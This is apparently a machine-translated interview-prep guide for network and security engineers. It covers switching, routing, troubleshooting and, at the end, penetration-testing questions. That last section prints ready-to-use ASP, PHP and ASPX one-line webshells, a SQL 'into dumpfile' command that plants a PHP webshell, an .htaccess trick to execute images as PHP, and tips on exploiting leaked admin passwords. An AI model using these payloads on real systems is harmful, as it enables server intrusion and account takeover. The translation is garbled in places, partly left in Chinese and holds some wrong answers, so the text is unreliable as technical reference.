スクリプトを使用して収集: ポート情報、サービス情報 システム コマンド収集: ドメイン内のユーザーはドメイン コマンドを使用してドメイン情報を収集できます ネット グループ "ドメイン ユーザー" /ドメインなどのポート スキャン ツールはマシン全体をスキャンします 情報収集: 管理パスワードとログイン ログによる管理の表示 メンバー IP、サービス パスワードの収集、ネットワーク セグメント情報の表示、および履歴の表示 イントラネット DNS ドメイン転送の脆弱性

企業ネットワークセキュリティの面接でよくある質問

1. 技術面接でよくある質問

質問 1: VLAN とは何ですか?

答え: --仮想 LAN

質問 2: VLAN の役割は何ですか?

回答:ブロードキャスト ドメインを分割する

質問 3: VLAN を導入した後の利点は何ですか?

答え:

1) ブロードキャスト ドメインを制限し、帯域幅リソースを節約する

2) LANのセキュリティ強化

3) ネットワークの堅牢性の向上

4) 柔軟なローカルエリアネットワークの構築

質問 4: VLAN を分割する方法は何通りありますか?

答え:

1) インターフェースに基づく

2) MAC アドレスに基づく

3) サブネットに基づく

4) プロトコルに基づく

質問 5: 企業で一般的に使用される分割方法は何ですか?

回答:インターフェースに基づく静的パーティショニング

質問 6: VLAN には何種類のポートの役割がありますか?

答え:

1)アクセス

2) トランク

3)ハイブリッド

4)チンク

質問 7: ACCESS と TRUNK の違いは何ですか?

答え:

1) トランク リンクは複数の VLAN のデータ転送を同時にサポートでき、データは VLAN タグを伝送します (ネイティブ VLAN を除く)。

2) アクセス リンクは一度に 1 つの VLAN のデータのみを送信でき、データ送信時に VLAN タグが削除されます。

3) トランク リンクは通常、スイッチとスイッチを接続するために使用されます。

4) アクセス リンクは通常、端末を接続するスイッチに使用されます。

質問 8: STP とは何ですか? MSTPとは何ですか?

答え:

1) stp: スパニングツリープロトコル

2) mstp: マルチプルスパニングツリープロトコル

質問 9: STP の役割は何ですか?

回答:レイヤ 2 ネットワークに冗長リンクがある場合、レイヤ 2 転送ループの発生を防ぐために使用されます。

質問 10: STP のポートの役割とポートのステータスは何ですか?

答え:

1) ポートの役割: ルートポート、指定ポート、非指定ポート

2) ポートのステータス: 無効、ブロッキング、リスニング、学習、転送

質問 11: STP の 2 つの測定値は何ですか?

答え:

1)桥ID :BID(ブリッジ識別子)

--構成: 16 ビット (2 バイト) 優先順位 + 48 ビット (6 バイト) MAC アドレス

--ブリッジの優先順位は手動で設定およびカスタマイズできます。範囲は 0 ~ 61440、デフォルト値は 32768、ステップ サイズは 4096 です。

2) ポート ID: PID (ポート識別子)

--構成: 4ビットのポート優先順位 + 12ビットのポート番号 (合計16ビット)

質問 12: ルート ブリッジ (RB) の選択方法

答え:

1) スイッチの BID を比較し、BID の小さい方がルートです。

--BID は 2 つの部分で構成されます: 優先順位 + MAC アドレス

質問 13: ルート ポートの役割とルート ポート (RP) の選択方法は何ですか?

答え:

1) 機能: BPDU メッセージの受信 (ルート ブリッジ命令の受信) に特化して使用されます。

2) 非ルート スイッチにはルート ポートが 1 つだけあります (ルート スイッチにはルート ポートはありません)。

ルール 1: 非ルート スイッチからルート スイッチまでのコストが最小のポートがルート ポートです。

ルール2: ルートスイッチへのコスト値が同じ場合、送信者のBIDを比較する

ルール 3: Cost の値と送信者の BID の値が同じ場合、送信者の PID を比較する

ルール 4: 送信側の PID も同じ場合、受信側の PID を比較する

質問 14: 指定ポートの役割と指定ポート (DP) の選択方法は何ですか?

答え:

機能: BPDU メッセージの送信 (ルート ブリッジ命令の送信) に特に使用されます。

ルール 1: ルート スイッチの最小コスト値を比較する

ルール 2: コスト値が同じ場合、2 つのスイッチは BID と PID を相互に比較します。

法則 1: ルート ブリッジ上のすべてのポートは指定ポートである

法則 2: ネットワーク ケーブル上の 1 つのポートはルート ポートであり、もう 1 つのポートは指定ポートでなければなりません

法則 3: 各ポートは 1 つの役割のみを引き受けることができます

法則 4: 同じリンク上に指定されたポートは 1 つだけです

質問 15: STP と比較した MSTP の利点は何ですか?

答え:

1) VLAN データの負荷分散

2) 迅速な収束

質問 16: RSTP は STP よりも早く収束するのはなぜですか?

答え:

1) P/Aの仕組み

2) 3 つのポート状態を削除: 無効、ブロッキング、リスニング (破棄、学習、転送)

3) 2 つのポートの役割を追加: 代替 (代替)、バックアップ (バックアップ)

質問 17: VRRP とは何ですか?

答え: --仮想ルーター冗長プロトコル

質問 18: VRRP はどのような問題を解決できますか?

答え:ルートバックアップ

質問 19: VRRP マルチキャスト アドレスは何ですか?

答え: 224.0.0.18

質問 20: VRRP ステータスとは何ですか?

答え:

1) 初期化する

2) アクティビティ(マスター)

3) バックアップ

質問 21: VRRP グループのメンバーの役割は何ですか?

答え:

1) マスター

2) バックアップ

3) 仮想

質問 22: VRRP のアクティブ ロールとバックアップ ロールを選択するための原則は何ですか?

答え:

1) まず優先度を比較し、優先度が高い方がマスターとなります。

2) 優先順位が一致している場合は、IP アドレスを比較し、IP アドレスが大きい方がマスターになります。

質問 23: VRRP の作業プロセスについて簡単に説明しますか?

答え:

1) メインゲートウェイは定期的に vrrp 通知メッセージ (レイヤー 3 ハートビート メッセージ) を送信します。

2) 通知メッセージ送信のサイクル時間: デフォルトで 1 秒

3) 通知メッセージの宛先アドレスはマルチキャスト アドレスです: 224.0.0.18

4) バックアップ ゲートウェイはメイン ゲートウェイのステータスを監視し、「送信サイクル」を 3 回繰り返しても、メイン ゲートウェイから送信された vrrp 通知メッセージを受信できない場合、バックアップ ゲートウェイは「メイン ゲートウェイ」にアップグレードされ、トラフィック転送タスク。

質問 24: OSPF とは何ですか?

答え:

-- オープン最短パス優先プロトコル

質問 25: OSPF の分野は何ですか?

答え:

1) ospf はエリアの概念を導入し、バックボーン エリアと非バックボーン エリアの 2 つの層に分割します。

2) 非基幹エリア:一般エリアと特別エリア

3) スタブエリア、Totally Stub エリア、NSSA エリア、Totally NSSA エリア

質問 26: ospf が近隣関係を確立できない理由は何ですか?

答え:

1) レイヤ 3 IP アドレスは相互に通信できません

2) 双方のルーター ID が同じである

3) 双方の市外局番が異なる

4) OSPF hello タイマーが異なります

5) OSPF デッドタイマーが異なります

6) サブネットマスクが異なります

7) 優先度はすべて0

8) 特殊マークビットが異なります

質問 27: OSPF にエリアを導入する利点は何ですか?

答え:

1) SPF の数を減らし、ルート計算を高速化します。

2) 経路集約や経路フィルタリングが可能で経路管理に便利

3) ネットワークの堅牢性を強化する 特定のエリアのトポロジが変更されても、他のエリアには影響を与えません。

質問 28: OSPF メッセージの 5 つのタイプは何ですか?

答え:

1) Hello: 近隣の発見、確立、保守、および削除に使用されます。

2) DD: データベース (LSDB) の同期に使用されます。

3) LSR: 相手側に必要な LSA を要求するために使用されます。

4) LSU: 必要な LSA を相手に送信するために使用されます。

5) LSACK: 受信したLSAを確認するために使用されます。

質問 29: 隣人の状況は何ですか?

答え:

1) ダウン: 電話を切る/切断する

2) init: 初期化状態。

3) 双方向: 双方向通信ステータス。

4) exstart: 交換初期化ステータス

5) 交換: 交換ステータス

6) ロード: ロード

7) 完全な隣接関係

質問 30: OSPF の作業プロセス

答え:

1) 隣接テーブルの作成

2) データベースを同期する

3) ルーティングテーブルを計算する

質問 31: ACL とは何ですか?

答え:

-- アクセス制御リスト

質問 32: ACL の役割は何ですか?

答え:

1) トラフィックを制御し、帯域幅リソースをカスタマイズする

2) 社内LANのセキュリティを確保するための制御動作

質問 33: ACL の分類は?

答え:

1) 基本-2000-2999 Cisco: 標準: 1-99

2) 拡張 -- 3000 ~ 3999 Cisco: 拡張: 100 ~ 199

3) レイヤ 2 -- 4000-4999 Cisco: 命名: 標準命名と拡張命名に分けられます。

4) ユーザー定義 - 5000-5999

5) ユーザー--6000-6999

質問 34: ACL の構成は何ですか?

答え:

1) ルール番号: 0~4294967296

2) アクション: 許可/拒否

3) 適合アイテム (適合アイテムの一部のみを紹介します):

-- レイヤ 2: 送信元 MAC アドレス、宛先 MAC アドレス、イーサネット フレーム プロトコル タイプ

-- 3 つの階層: 送信元 IP アドレス、宛先 IP アドレス、プロトコル番号

-- レイヤ 4: 送信元ポート、宛先ポート

質問 35: ACL の一致順序は何ですか?

答え:

1) ACL は複数の拒否 | 許可ステートメントで構成できます。

2) 各ステートメントはルールを説明するため、1 つの ACL 番号の下に複数のルールを含めることができます。

3) ただし、これらのルールには重複または矛盾がある可能性があります。

# ルール 10 拒否 IP 送信元 192.168.1.1 0

# ルール 20 許可 IP ソース 192.168.1.0 0.0.0.255

4) Huawei 機器のデフォルトの ACL マッチング順序は設定モードです。

@マッチング順序:

--ACL ルール番号に従ってパケットを昇順で照合します (番号が小さいほど優先順位が高くなります)。

-- マッチング時に停止し、ルールの要件に従って許可または拒否アクションを実行します。

-- パケットが ACL リストの最初のエントリと一致しない場合は、2 番目のエントリを下向きに一致させ続けます。

--ACL リスト内のどのエントリも一致しない場合は、暗黙的なルールを実行します。

-- 暗黙のルールが 2 つあり、1 つはすべてを拒否すること、もう 1 つはすべてを許可することです。

質問 36: ACL の暗黙のルール

答え:

1) Huawei はすべてのマッチングルールを許可します

@aclとtraffic-filterを連携させる場合

@そして、データパケットがACLリストのどのルールにも一致しない場合

2) ファーウェイはすべてのマッチングルールを拒否します

@ACLがトラフィックフィルターにリンクされていない場合、すべて拒否されます

#acl が nat に関連付けられている場合、acl がポリシー ルーティングに関連付けられている場合、および acl が vty に関連付けられている場合

質問 37: ACL の特性

答え:

1) ACL はデバイス自体の発信トラフィックには影響せず、通過トラフィックにのみ影響します。

質問 38: NAT とは何ですか

答え: --ネットワークアドレス変換

質問 39: NAT の役割

答え:

1) IPv4アドレスの節約を前提とした多数のイントラネットホストと公衆網間の通信を実現

2) イントラネットをある程度保護し、社内ネットワークやIPを隠す

質問 40: NAT の分類

答え:

1) napt ----大企業向け

2) easy-ip -- 中小企業向け -- NAT の送信インターフェイスを使用する

3) nat サーバー --- ポート マッピング。一部の特殊なプロトコルでは、NAT ALG 機能をオンにする必要があります。

質問 41: DHCP とは何ですか

答え: --動的ホスト構成プロトコル

質問 42: DHCP の役割

答え:

1) DHCP クライアント

2) DHCPサーバー

3) DHCPリレー

質問 43: 初めての DHCP アクセス

答え:

1) クライアントは DHCP 検出メッセージ (discover) をブロードキャストし、DHCP サーバーを探します。

2) サーバーは、それを受信した後、クライアントの DHCP 要求に応じて DHCP 応答メッセージ (オファー) をユニキャストします。

3) クライアントは、ブロードキャストで DHCP 要求メッセージ (リクエスト) を送信し、リースされた IP アドレスを要求します。

4) サーバーがそれを受信すると、クライアントへの DHCP 確認メッセージ (ack) への応答をユニキャストします -- IP アドレスをクライアントにリースします

実際、このプロセスにはさらに 2 つの非常に重要なアクションがあります。

注 1: DHCP サーバーがホストに IP アドレスを割り当てると、ICMP ping 検出を実行できます。

検出の目的は、クライアントの競合が発生してインターネットにアクセスできなくなることを回避するために、配布された IP アドレスが空いていて競合がないことを確認することです。

なぜ?DHCP はどの IP アドレスを配布したかを知りませんか? もちろんわかっていますが、特殊な事情があるのです。

特殊なケースとして、一部のコンピュータでは静的 IP アドレスが手動で設定されている場合がありますが、この DHCP サーバーは制御できないため、ping 検出を行うことができます。

[DHCP-R1]dhcp サーバー ping パケット 3 //icmp 検出を設定する

[DHCP-R1]dhcp server ping timeout 1000 //検出タイムアウトを設定する

注 2: クライアントは、サーバーから送信された ACK 確認メッセージを受信した後、

実際には、無料の ARP (宛先アドレスが自分の IP アドレスである ARP) を送信する必要があるため、心配する必要はありません。

DHCPで自分に割り当てられたアドレスが他人に使われていないか検出し、解決されたMACアドレスが自分のMACアドレスであれば安心です。

2. 注: 詳しい面接の質問は参考用です。

質問 44: IS-IS ルーターの種類

答え:

1) レベル 1 ルーター

2) レベル 2 ルーター

3) レベル 1-2 ルーター

質問 45: IS-IS は近隣関係を確立します

答え:

1) 同じレベルにある隣接ルータのみがネイバーになれます。

2) レベル 1 ルーターの場合、エリア番号は一貫している必要があります。

3) リンクの両端の IS-IS インターフェイスのネットワーク タイプは一貫している必要があります。

4) リンクの両端の IS-IS インターフェイスのアドレスは、同じネットワーク セグメント内にある必要があります。

質問 46: IS-IS メッセージの種類

答え:

1) Hello: Hello メッセージ。近隣関係を確立および維持するために使用され、IIH とも呼ばれます。

2) LSP: リンク ステータス メッセージ LSP、リンク ステータス情報を交換するために使用されます。

3) SNP: シーケンス番号メッセージ SNP、SNP には完全なシーケンス番号メッセージ CSNP と部分的なシーケンス番号メッセージ PSNP が含まれます。

質問 47: IS-IS と OSPF の違い

答え:

1) IS-IS プロトコルは 2 つのネットワーク タイプのみをサポートし、OSPF プロトコルは 4 つのネットワーク タイプをサポートします。

2) IS-IS プロトコルは L1/L2 エリアに分かれており、L2 はすべての詳細なルートが存在するバックボーン エリアであり、L1 から L2 へのデフォルト ルートのみが存在します。OSPF は、バックボーン領域、共通領域、特殊領域に分かれています。共用エリアと専用エリア間のクロスリージョンアクセスにはバックボーンエリアを経由する必要があります。

3) IS-IS プロトコルのメッセージ タイプは LSP メッセージのみです。これは単純かつ効率的であり、再帰的な計算を必要としません。OSPF プロトコル LSA のタイプはタイプ 1/2/3/4/5/7 など多様で、再帰的な計算が必要であり、きめ細かいスケジューリング計算に適しています。

4) ISIS プロトコルは比較的早く収束し、ルーティングを計算するためのメッセージ オーバーヘッドは比較的小さいです。OSPF プロトコルは比較的扱いにくく、複雑です。

5) ISIS プロトコルはシンプルな構造で拡張が容易な TLV 伝送を使用し、OSPF プロトコルは IPv4 と IPv6 をサポートし、OSPF プロトコルは 2 つの独立したバージョン (OSPFv2 と OSPFv3) をサポートします。

質問 48: BGP とは何ですか

答え:

1) BGP: ボーダー ゲートウェイ プロトコル

2) BGP は公的標準プロトコルであり、どのメーカーの機器でもサポートされています。

3) OSI モデルのレイヤー 7 (アプリケーション層) に位置し、最下層は TCP プロトコルを使用し、ポート番号は 179 です。

質問 49: 5 種類の BGP メッセージ

答え:

1) オープンメッセージ: 近隣関係を確立するために使用されます。

2) キープアライブ: ネイバー関係を維持するために使用されます (定期的に送信し、BGP 接続を維持します)。

3) update: ルーティング情報を更新するために使用されます。

4) 通知: エラー メッセージ メッセージ、BGP 接続を切断するために使用されます。

5) router-refresh: ネイバーにルーティング情報の再送信を要求します。

質問 50: BGP の 6 つの状態

答え:

1) アイドル: 初期化状態

2) 接続: TCP 接続ステータス

3) アクティブ: アクティブ状態

4) オープン送信済み: オープン メッセージが送信されました。 ステータス: オープン メッセージがネイバーに送信されました。

5) open comfirm: オープンメッセージ確認ステータス

6) 確立: 接続が確立されました。

質問 51: BGP 通知の原則

答え:

1) 最良のルーティング エントリのみを近隣に送信します

2) EBGP を通じて取得された最適なルートは、すべての BGP ネイバーに公開されます。

3) IBGP 経由で取得した最適なルートは、他の IBGP ネイバーに公開されません (スプリット ホライズンによる効果的なループ防止)

4) BGP および IGP 同期 (Huawei ではデフォルトでオフになっています)

問題 52: IBGP スプリット ホライズン ソリューション

答え:

1) BGP完全相互接続

2) BGP アライアンス

3) ルートリフレクター

質問 53: リスト 2 BGP で認識される必須属性

答え:

1) Origin 属性: パス情報のソースを定義します。

2) AS_path 属性: 経路が送信元アドレスから宛先アドレスまで通過する AS 番号を順番に記録します。

3) Next_Hop: 経路のネクストホップ情報を定義します。

質問 54: MPLS とは何ですか

答え:

1) MPLS: マルチプロトコルラベルスイッチング

質問 55: MPLS ネットワーク アーキテクチャ:

答え:

1) ラベルスイッチングを行うルーターをLSR(Label Switch Router)といいます。

2) 複数の LSR ルータで構築されるエリアを mpls エリアと呼びます

--LER--ingress: エントリ ノード---ラベル プッシュ---mpls エリア エッジ デバイス

--lSR--中継: 中間ノード---転送

--LER--出力: 出力ノード---ラベル ポップアップ---MPLS エリア エッジ デバイス

質問 56: MPLS では、LSP とは何ですか?

答え:

1) LSP: ラベル スイッチング パス -- ラベルを使用してデータを転送するには、まず LSP を確立してから、ラベル データを転送する必要があります。

質問 57: MPLS ラベル割り当て範囲

答え:

1) 0--15: 特別なタグ

2) 16--1023: 通常、静的 LSP の作成で使用されるラベル

3) 1024---上: 通常、動的 LSP の作成に使用されるラベル

質問 58: MPLS ラベル発行方法:

答え:

1) DU モード: ダウンストリームアクティブモード --- Huawei のデフォルト

2) DoD方式:下流オンデマンド方式

質問 59: MPLS ラベル配布方法:

答え:

1) 独立割当(Independent)方式

2) 順序付け配布方式

60. MPLS ラベルを保存する方法:

1)libral:自由な方法:すべてを保存

2) 保守的: 保守的な方法: 最良のものを保存する

3. トラブルシューティングの面接でよくある質問

質問 1: コンピューターの電源をオンにできない理由は何ですか? トラブルシューティングのアイデアは何ですか?

答え:電源、マザーボード、CPU、メモリ、静電気、ハードディスク、システム

質問 2: コンピューターの遅延の理由は何ですか? 解決策は何ですか?

答え:

1) 起動項目の最適化

2) ディスクの断片化を最適化し、ゴミをクリーンアップします。

3) サービスとプロセスの最適化

4) ウイルス対策

5) メモリを増やす

6) ソリッド ステート ドライブを交換します。

質問 3: コンピュータがインターネットにアクセスできない理由は何ですか? トラブルシューティングのアイデアは何ですか?

答え:

1) ラインを確認します (ライン テスター) - コンピューターの右下隅に赤い十字や感嘆符が表示されていますか? または正常に表示されていますか? クリスタル ヘッドが酸化していないか、ネットワーク カード ドライバーが存在するかどうかを確認します。

2) IP アドレスが取得できるか、取得した IP アドレスが正当であるかを確認します (ipconfig /release ipconfig /renew)

3) tcp/ip サービスネット winsock リセットをリセットします。

4) LAN上にdhcpスプーフィング攻撃やarpスプーフィングが存在していないか確認する

5) インターネット行動管理による制限がかかっていないか確認する

6) ウイルス感染の有無を確認し、消毒する

7) 消去法を使用して、コンピュータ、ネットワーク ケーブル、ネットワーク カード、およびスイッチ インターフェイスを交換します。

質問 4: 部門内の数十台のコンピュータがインターネットにアクセスできません。理由は何ですか? どう思いますか?

答え:

1) 障害が発生したコンピュータが同じ VLAN に属し、同じスイッチに接続されているかどうかを確認します。

2) アクセスレイヤスイッチの状態、設定、ポート、トラフィックを確認する アップリンクスイッチとの通信が正常か確認する アップリンクスイッチを確認する

3) イントラネット上で dhcp スプーフィング攻撃がないか確認する

4) イントラネット内にレイヤ 2 ループがあるかどうかを確認します。

5) イントラネット上で ARP 攻撃がないか確認する

6) ウイルスやトロイの木馬をチェックする

7) オンラインでの行動管理に制限がないか確認する

質問 5: 会社全体がインターネットにアクセスできません。理由は何ですか? 障害の原因を迅速に特定するにはどうすればよいですか?

答え:

1) コンピュータが正当な IP アドレスを取得できるかどうかを確認します。

2) コアスイッチのステータス、構成、インターフェイスを確認します。

3) 出力ファイアウォールのステータス、構成、インターフェイスを確認します。

4) ping を使用してテストします。コアに ping、ファイアウォールの内部ネットワーク ポートに ping、ファイアウォールの外部ネットワーク ポートに ping、パブリック ネットワークのゲートウェイ アドレスに ping、パブリック ネットワークの DNS アドレスに ping を実行します。

5) ネットワーク攻撃やネットワーク乗っ取りがないか確認する

4. 一般知識面接の質問 1

質問 1: 前の会社での主な責任は何でしたか、また毎日の主な仕事は何でしたか?

回答:履歴書の職歴記載に基づいて回答します。

質問2:日常の運転・保守点検はどのように行われていますか?気になる点は何ですか?

答え:

1) 机房环境检查(温度,湿度,灰尘,静电,空调,IPS,市电、防火,防水,防雷)

2) 设备运行状态检查

3) 设备端口内容检查

4) 运行业务检查

5) 安全防护检查

6) 确认公司是否有部署类似esight平台、zabbix 平台等

问题3:你上家公司的网络拓扑图你画一下

答案:亿图、visio、太多软件了

问题4:你有用过那些厂商的设备,具体是那些型号?

答案:已化为为例:去华为、H3C、锐捷、天融信,深信服,启明星辰,思科,神州数码官网去查

1) s1700系列

2) s2700系列

3) s3700系列

4) s5700系列 比如 s5720 s5730

5) s6700系列

6) s7700系列 比如 s7703 s7706 s7710 s7712

7) s9700系列

8) s12700系列

9) s12800系列

问题5:怎么判断交换机二层网络中是否存在环路?

答案:

1)通过display interface brief | include up命令,接近100%,

2.)判断交换机是否存在MAC地址漂移

− 可以多次执行display mac-adrress来观察,若MAC地址在交换机不同的接口学习到。

五、常识类面试题2

问题1:你在工作中有遇到过那些问题,你是如何解决的?

答案:结合你的简历中描述的工作经验去回答,可以提前去技术论坛查找一下运维工作解决方案

问题2:你熟悉oa/erp/crm/邮箱/视频会议系统吗,你都了解那些厂商的?

答案:致远、泛微、sap、用友、金蝶、浪潮···········

问题3:你熟悉无线覆盖吗,如何实施无线覆盖,你大概描述一下?

答案:

1)AP+AC+POE供电交换机模式

2)确认环境、确认信号穿透效果

3)确认部署方式,壁挂&吸顶

4)确认信息点数量、AP数量、AC数量、POE交换机数量

5) ルーティング、ワイヤレス ローミング、完全なワイヤレス カバレッジ、チャネル干渉、およびセキュリティ認証

質問 4: 社内の従業員のオンライン行動を制御するにはどうすればよいですか? 良い方法はありますか?

回答:インターネット行動管理

6. ペネトレーション テストのポジションに対する一般的な面接の質問 (コース以外の知識 -- 参考のみ)

質問 1: ステーションをテストしてもらったら、最初に何をすべきだと思いますか?

回答: -- 情報の収集: Whois、Web サイトのソース IP、サイド サイト、C セグメント Web サイト、サーバー システムのバージョン、コンテナーのバージョン、プログラムのバージョン、データベースの種類、第 2 レベルのドメイン名、ファイアウォール、メンテナー情報については別途説明します。 。

質問 2: 侵入プロセス中に、ターゲット サイトの登録者の電子メール アドレスを収集することはどのような価値をもたらしますか?

答え:

1) それをソーシャル ワーカー データベースに投げて、漏洩したパスワードがあるかどうかを確認し、漏洩したパスワードを使用してバックエンドにログインしてみます。

2) 検索エンジンに入力するキーワードとして電子メールを使用する

3) 検索された関連情報を使用して、他の電子メール アドレスを検索し、よく使用されるソーシャル アカウントを取得します。

4) ソーシャルワーカーはソーシャルアカウントを見つけ、管理者のパスワード設定の習慣を知る可能性があります。

5) 既存の情報を使用して専用の辞書を生成する

6) 管理者がよくアクセスする非人気 Web サイトを観察し、それを削除すると、さらに良い結果が得られます。

質問 3: 一般的な Web サイトサーバーコンテナは何ですか?

答え:

--IIS、Apache、nginx、Tomcat、weblogic、jboss

質問 4: Web シェルを取得したところ、Web サイトのルート ディレクトリに .htaccess ファイルがあることがわかりました。どうすればよいですか?

回答: --できることはたくさんありますが、例としてHidden Net Horseを使用してみましょう:

插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php </FilesMatch>

.jpg ファイルは .php ファイルに解析されます

質問 5: インジェクションの脆弱性はアカウントのパスワードをチェックすることしかできませんか?

回答: -- パンツを脱いで、Web シェルをアップロードし、コマンドを実行できます。

質問 6: セキュリティ犬は変数を追跡し、それが一文のトロイの木馬であることを突き止めますか?

回答: -- 署名に基づいているため、簡単に回避できます。

質問 7: CSRF、SSRF、リプレイ攻撃の違いは何ですか?

答え:

1) CSRF は、クライアントによって開始されるクロスサイト リクエスト フォージェリ攻撃です。

2) SSRF はサーバー側のリクエスト フォージェリであり、サーバーによって開始されます。

3) リプレイ攻撃とは、本人認証などを目的として、傍受したデータパケットを再生する攻撃です。

質問 8: ビジネス ロジックの脆弱性を少なくとも 3 つ挙げて、それらを修正する方法を教えてください。

答え:

1) パスワード検索の脆弱性にはブルートフォースクラッキングが可能なパスワードが存在する、ユニバーサル検索資格情報が存在する、検証ステップをスキップできる、取得資格情報を傍受して取得できるなど、提供されているパスワード検索機能を通じてパスワードを取得できます。メーカーによる。

2) 最も一般的な ID 認証の脆弱性は、セッション固定攻撃と Cookie の偽造であり、セッションまたは Cookie が取得される限り、ユーザーの ID は偽造される可能性があります。

3) 検証コードの脆弱性は、ブルートフォースクラッキングを可能にする検証コードであり、JavaScript やパッケージの変更により検証コードを回避することができます。

質問 9: よく使用される侵入ツールは何ですか?最もよく使用されるものはどれですか?

答え:

げっぷスーツ、appscan、avwvs、sqlmap、fiddler など

質問 10: よく注目しているセキュリティ プラットフォームについて教えてください。

答え:

たとえば、tools.net、90sec、Prophet Community、Safe Guest、freebuf などです。

質問 11: sqlmap、注入ポイントを注入する方法は?

答え:

1) getモデルの場合は、sqlmap -u「URLなど」を直接使用します。

2) ポイントなどの投稿タイプの場合は、sqlmap -u "injection point URL" --data="postparameters" を実行できます。

3) Cookie、X-Forwarded-For などの場合、アクセス可能な場合は、burpsuite を使用してパケットをキャプチャし、注入ポイントを * に置き換えてファイルに置き、次に sqlmap -r "ファイル アドレス」

質問 12: SQL インジェクションにはどのような種類がありますか?

答え:

1) エラー挿入

2) ブール型インジェクション

3) 遅延注入

4)ワイドバイトインジェクション

質問 13: ブラインド注射と遅延注射の共通点は何ですか?

答え:

それはすべて文字ごとに判断されます。

質問 14: SQL インジェクションとファイルの書き込みの関数は何ですか?

答え:

(1)出力ファイル「パス」に「文」を選択します

(2)ダンプファイル「パス」に「文」を選択します

(3) 「<?php eval($_POST[1]) ?>」をダンプファイル「d:\wwwroot\baidu.com\nvhack.php」に選択します。

質問 15: owasp の脆弱性は何ですか?

答え:

1) SQL インジェクションの保護方法:

2) ID 認証とセッション管理の失敗

3) クロスサイトスクリプティング攻撃 XSS

4) 安全でないオブジェクトへの直接参照

5) セキュリティ設定エラー

6) 機密情報の漏洩

7) 機能レベルのアクセス制御の欠如

8) クロスサイトリクエストフォージェリCSRF

9) 既知の脆弱性を含むコンポーネントを使用する

10) 未検証のリダイレクトと転送

質問 16: SQL インジェクションの保護方法は?

答え:

1) 安全な API を使用する

2) 入力された特殊文字をエスケープする

3) ホワイトリストを使用して入力検証方法を標準化する

4) クライアント入力を制御し、SQL インジェクションに関連する特殊文字の入力を許可しません。

5) サーバー側は、SQL クエリのためにデータベースに特殊文字を送信する前に、特殊文字をフィルタリング、エスケープ、置換、および削除します。

質問 17: Linux システムのセキュリティを強化するには何を行う必要があるかを簡単に説明してください。

答え:

1. パスワードセキュリティポリシー

2. 不要なポートとサービスを閉じる

3. ファイルのパーミッションなどを設定します。

質問 18: システムにバックドアがあるかどうかを判断するためにどのようなツールを使用しますか?

答え:

プロセスとサービスを表示するための phunter 攻撃

質問 19: Linux 用の Selinux とは何ですか?

答え:

Selinux をセットアップするにはどうすればよいですか? SELinux は、特定のファイルのみにアクセスするようにプログラムを制御するセキュリティ サブシステムです。

セットアップ ツールを使用して、グラフィカル シャットダウン検索を開始するか、/etc/sysconfig/selinux ファイル SELINUX=disabled を変更します。

サービス iptables start または /etc/init.d/iptables start を使用してファイアウォールを開きます。

質問 20: MySQL テーブルの権限には、追加、削除、変更、確認、ファイルの読み書きの他にどのような権限がありますか?

答え:

並べ替え、クエリ、インデックス作成など。

質問 21: mysql のセキュリティを確保するにはどうすればよいですか?

答え:

MySQL アカウント権限のセキュリティ

Mysql データのネットワーク セキュリティ構成

パスワードポリシーのセキュリティ

MySQLログ

Mysql データベース サービスが配置されているホストのセキュリティ構成

SQL インジェクションの検出および防御モジュールを導入する

mysqld セキュリティ関連の起動オプション

mysqlバックアップ戦略

質問 22: mysql データベースにはデフォルトでどのようなライブラリが含まれていますか? 図書館に名前を付けますか?

答え:

1.mysql ライブラリ。ユーザーおよびその他の情報を保存します。

2.information_schema、テーブルやロックなどのパフォーマンス情報を保存します。

3.test、mysql 自作テスト ライブラリ

4.パフォーマンススキーマ、ミューテックスロック、およびその他の情報 (5.6 より前は手動でオンにする必要があります。5.6 以降はデフォルトでオンになります)

質問 23: CSRF 脆弱性の性質は何ですか?

答え:

本質はxssです

質問 24: XSS 脆弱性が与えられた場合、ワームを構築するには他にどのような条件が必要ですか?

回答:ストレージ タイプの xss であり、Weibo、フォーラムなど、頻繁にアクセスされるページまたはフォロー ボタンが必要です。

質問 25: ソーシャル ネットワーキング Web サイトで、ワームが発生しやすい場所はどこですか?

回答: Weiboのフォロー、ソーシャルレポート調査、Tiebaのコメントなど。

質問 26: バックドア型トロイの木馬を手動で見つけるためのヒントは?

答え:

1) まず、最も注意すべき点はシステムのスタートアップ項目です。「ファイル名を指定して実行」-「msconfig コマンド」を入力して開いたシステム構成ユーティリティでスタートアップ リストを確認できます。バックドア型トロイの木馬の 99% は自身を自動起動の目的を達成するためのシステム サービス 疑わしいものが見つかった場合、この項目は対応するパスを直接開き、プログラム ファイルを見つけて直接削除し、自動起動を無効にします。

2) Windows のシステム キー ディレクトリ system32 とシステム インストール ディレクトリ内のファイルを確認します。XP システムでの 2 つのデフォルト パスは、それぞれ C:\WINDOWS\system32 と C:\WINDOWS\ です。次に、最新に変更されたファイルの中に、疑わしい実行可能ファイルまたは dll ファイルはありますか? これら 2 つの場所は、トロイの木馬のお気に入りの隠れ場所です (ヒント: すべてのファイルを表示するフォルダーを必ず設定してください)。

3) ネットワーク接続に異常がないかを確認します。コンピュータに詳しくない場合は、「ファイル名を指定して実行」-「cmd」-「netstat -an」でも、不審なネットワーク接続や異常なネットワーク接続がないか確認できます。 , 360 のトラフィック監視機能を使用することをお勧めします。より直感的で便利です。リモート接続ポートに特に注意してください。8000 に似たポートがある場合は、それに注意を払う必要があります。8000 は、のデフォルトのポートです。 Gray Pigeon。バックドア トロイの木馬のテスト中にネットワーク接続でポート 8000 を見つけたことを覚えています。もちろん、これは、ポート 8000 にネットワーク接続がない限り安全であるという意味ではありません。ポート 8000 は唯一の機能であるためです。 Gray Pigeon がオンラインになるデフォルトのポートですが、このポートは変更できます。

4) 上記の方法により、コンピュータ上で不審なファイルが見つかった場合は、手動で削除できます。もちろん、ウイルス対策ソフトウェアの機能を利用することもできます。トロイの木馬のバックドアに遭遇した場合でも、パニックに陥る必要はありません。最善かつ最も完全な方法は、システムを再インストールし、セーフ モードで最新のウイルス データベースを使用してウイルスをスキャンして駆除することです。

質問 27: よく使用される 1 文のトロイの木馬は何ですか?

答え:

ASP 文トロイの木馬:

<%execute(request("value"))%>

PHP 一文トロイの木馬:

<?php @eval($_POST[値]);?>

変形:

<?php $x=$_GET['z'];@eval(“$x;”);?>

aspx 一文トロイの木馬:

<%@ ページ言語="Jscript"%>

<%eval(Request.Item["value"])%>

質問 28: Web サーバーが侵入された後のトラブルシューティングはどのようにすればよいですか?

答え:

1) Webサーバーのログを確認する

2) 異常なポートが開いていないか確認します。

